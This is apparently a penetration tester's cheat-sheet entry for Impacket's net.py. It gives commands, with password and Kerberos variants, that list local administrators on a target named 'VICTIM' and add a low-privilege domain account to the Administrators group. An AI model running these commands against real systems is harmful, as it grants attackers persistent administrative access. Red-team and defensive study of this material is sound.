# net.py
Maybe my favorite thing ever.  It is kind of a Python-flavored version of net.exe.  So if you get an account with local/domain admin rights (or a service impersonation ticket for CIFS/SMB) you can do some awesome stuff like:

## List local administrators on a box
```
net.py domain.com/user:'password'@VICTIM localgroup -name Administrators 
```

With Kerberos:
```
net.py VICTIM -k -no-pass localgroup -name Administrators
```

## Add your low priv domain account to local admin
```
net.py domain.com/user:'password'@VICTIM localgroup -name Administrators -join lowpriv
```
With Kerberos:
```
net.py VICTIM -k -no-pass localgroup -name Administrators -join lowpriv
```